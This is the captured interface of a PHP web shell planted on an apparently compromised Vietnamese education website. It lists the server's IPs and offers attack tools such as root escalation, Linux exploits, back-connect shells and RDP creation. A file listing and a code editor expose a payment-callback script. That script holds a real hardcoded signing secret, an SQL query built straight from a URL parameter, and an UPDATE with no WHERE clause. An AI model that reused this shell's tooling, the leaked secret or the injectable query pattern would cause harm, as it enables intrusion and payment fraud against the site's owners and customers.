Linux vps.sdns.vn 3.10.0-1160.99.1.el7.x86_64 #1 SMP Wed Sep 13 14:19:20 UTC 2023 x86_64
LiteSpeed
: 103.74.117.127 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
7.3.33
pcem
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
pcem /
domains /
pcem.edu.vn /
public_html /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
view_about.php
12.91
KB
-rw-r--r--
view_article _type.php
0
B
-rw-r--r--
view_article.php
18.81
KB
-rw-r--r--
view_brand.php
394
B
-rw-r--r--
view_call_btn.php
11.57
KB
-rw-r--r--
view_confirm.php
883
B
-rw-r--r--
view_contact.php
13.05
KB
-rw-r--r--
view_criteria.php
437
B
-rw-r--r--
view_customer.php
1.92
KB
-rw-r--r--
view_detail_about.php
2.56
KB
-rw-r--r--
view_detail_article.php
21.69
KB
-rw-r--r--
view_detail_document.php
1.85
KB
-rw-r--r--
view_detail_media.php
2.72
KB
-rw-r--r--
view_detail_product.php
3.27
KB
-rw-r--r--
view_document.php
2.58
KB
-rw-r--r--
view_footer.php
4.07
KB
-rw-r--r--
view_header.php
6.78
KB
-rw-r--r--
view_hits.php
871
B
-rw-r--r--
view_home.php
19.52
KB
-rw-r--r--
view_huongdan.php
699
B
-rw-r--r--
view_index.php
3.73
KB
-rw-r--r--
view_khachhangtaiphat.php
1.99
KB
-rw-r--r--
view_lang.php
2.04
KB
-rw-r--r--
view_login.php
9.89
KB
-rw-r--r--
view_media.php
3.26
KB
-rw-r--r--
view_media_type.php
0
B
-rw-r--r--
view_menu_left.php
212
B
-rw-r--r--
view_menu_top.php
1.93
KB
-rw-r--r--
view_menuhome.php
0
B
-rw-r--r--
view_order_detail.php
3.41
KB
-rw-r--r--
view_partner.php
963
B
-rw-r--r--
view_pay_cart.php
42.97
KB
-rw-r--r--
view_pay_cart_not_isset.php
335
B
-rw-r--r--
view_pay_cart_result.php
1.68
KB
-rw-r--r--
view_product.php
2
KB
-rw-r--r--
view_product_cat.php
2.08
KB
-rw-r--r--
view_product_cat3.php
1.99
KB
-rw-r--r--
view_product_cat4.php
1.99
KB
-rw-r--r--
view_product_new.php
1.99
KB
-rw-r--r--
view_register.php
6.61
KB
-rw-r--r--
view_search.php
18.67
KB
-rw-r--r--
view_shopping_cart.php
1.99
KB
-rw-r--r--
view_showroom.php
1.5
KB
-rw-r--r--
view_slideshow - Copy.php
1.38
KB
-rw-r--r--
view_slideshow.php
565
B
-rw-r--r--
view_support.php
1.54
KB
-rw-r--r--
view_thuvien.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view_pay_cart_result.php
<div class="container wrap" id="disablescroll"> <div class="lead_sub"> <?php echo $mod_xu_ly_chung->breadcrumbs();?> </div> <div class="clearb"></div> <div id="contenu"> <?php //kết quả trả về if(empty($_GET["signature"])) { ?> <div class="error_login"> <?php echo "Có lỗi xảy ra."; ?> </div> <?php } else { $secret_key= 'Webhaido@halink2019.vn'; $websiteid = $_GET["website_id"]; $amount = $_GET["amount"]; $message = $_GET["message"]; $payment_type = $_GET["payment_type"]; $reference_number = $_GET["reference_number"]; // Mã đơn hàng $status = $_GET["status"]; $trans_ref_no = $_GET["trans_ref_no"]; $sign = $_GET["signature"]; $plaintext = $amount . "|" . $message . "|" . $payment_type . "|" . $reference_number. "|" . $status. "|" . $trans_ref_no. "|" . $websiteid. "|" . $secret_key; $mysign = strtoupper(hash('sha256', $plaintext)); if($mysign != $sign){ echo "<p align='center' style='color: red;'>Có lỗi đã xảy ra</p>"; } else { switch($status){ case 1: //query lấy mã đơn hàng trong csdl $querycheck = DB::query("SELECT * FROM tragopquathe WHERE orderid = '$reference_number'"); if(count($querycheck)) { $queryupdate = DB::query("UPDATE tragopquathe SET status = 'Đã thanh toán'"); } echo '<p align="center">Thành công</p>'; break; case 7: echo '<p align="center">Đang xử lý</p>'; break; default: echo '<p align="center" style="color: red;">Không thành công</p>'; break; } } } ?> </div> </div>
Close